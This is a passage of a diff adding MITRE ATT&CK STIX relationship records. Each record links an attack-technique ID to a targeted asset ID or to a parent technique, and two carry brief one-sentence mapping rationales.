"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3e95d0fe-8688-4eda-ab60-8cf7577d6ce4", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3ecf1be3-0606-41dc-88f4-c246183030b5", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3edcbd94-a7d6-4487-82fc-75ebf3009e90", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3ee873c6-5e94-4c31-91c7-15d71892ee90", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3ee8ef8e-c4ad-4332-b4ff-3e45d9c21f66", + "created": "2024-03-29T16:59:11.210Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-29T16:59:11.210Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3eef17bd-57ab-4262-81a7-a5e205aba5a1", + "created": "2020-01-24T20:02:59.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3f07067f-0cbc-489c-8722-a33399ebd4f9", + "created": "2023-09-29T17:39:42.457Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:39:42.457Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3f0bdc47-230f-4228-8d55-41023f34c305", + "created": "2021-09-22T17:45:10.377Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3f0ccf26-2cd9-462e-88b4-7d3394900d34", + "created": "2024-06-26T15:35:02.834Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:35:02.835Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3f10990c-06a5-48ab-9272-21922bd36e21", + "created": "2024-06-26T13:36:55.196Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:36:55.196Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3f1a6063-40b1-453f-8fa1-416fffff7b25", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3f2054ea-4661-4341-a97f-53b5f8098989", + "created": "2024-06-26T13:43:35.326Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:43:35.326Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3f403d71-cb42-4f08-a0f3-ea6956d35dcb", + "created": "2022-02-25T15:27:45.019Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-24T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3f5a18e5-5596-4d0c-81dc-33c6bc2f7c15", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3f7f515f-25f9-4afb-becf-6247f4d6ecd2", + "created": "2020-03-15T14:59:15.485Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3f92c11b-f6e2-4c07-9913-9fa7469ba4fe", + "created": "2023-09-28T21:17:18.201Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:17:18.201Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3fb5923a-ec5b-4d8e-b86d-1f200f49c381", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3fbe092c-7029-4c31-ac96-9fd2fb13fa2c", + "created": "2020-02-11T19:05:45.921Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3fc30649-c62f-4b0c-ae83-4f9b700c6dab", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3fc57073-4ae8-420c-bce2-52c7586ce6a2", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3fdad72a-cc50-4c75-8cba-78448098a716", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3fdf4c94-9b7a-4bfd-85b5-43bbd539fa1a", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3fe5844e-d197-4636-a4c4-b89b368c2597", + "created": "2020-10-02T16:58:58.847Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca", + "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3fe69c6d-6722-44ad-bab7-e34981d68daa", + "created": "2023-09-28T20:27:43.727Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:27:43.727Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3fece5e5-a606-458c-8a06-277161a08d5c", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3ffda000-9e1b-4f63-8cc4-7b31feeb0b12", + "created": "2020-03-02T19:08:18.033Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--40004ec5-d104-4fe9-880c-fbb1fcf53b01", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--40091ea1-6e00-4e8e-9269-100e29061448", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4009f173-4a6a-448b-8253-70f88c3fa2b7", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4011b9e8-317f-40b9-bd3c-3fb1e99c6542", + "created": "2023-09-29T18:57:32.665Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-05-28T01:30:54.102Z", + "description": "Asset Mapping Rationale: Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse.", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4030c6bb-1f3d-4553-90d7-b984c12c5eb7", + "created": "2020-01-14T01:30:41.175Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4059859a-df6d-468f-b68e-c9224632531c", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4059da6f-b52b-4265-8bf9-3ad6154dbde4", + "created": "2023-09-29T18:05:42.611Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:05:42.611Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--40637c57-1df4-47b0-9684-fe270ff5647c", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--40662471-6d5c-407d-8526-bb857a4d53b4", + "created": "2024-05-23T04:06:53.716Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T01:33:16.625Z", + "description": "Asset Mapping Rationale: Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp.", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4081cccb-b48e-47de-b2fd-c1ff01a3c8a9", + "created": "2024-06-26T15:38:58.493Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:38:58.493Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--40a6a485-596b-48bf-a446-1cb92e76275b", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--40c4ea0c-4025-4176-bfbd-0ae9d5fc3f3a", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": 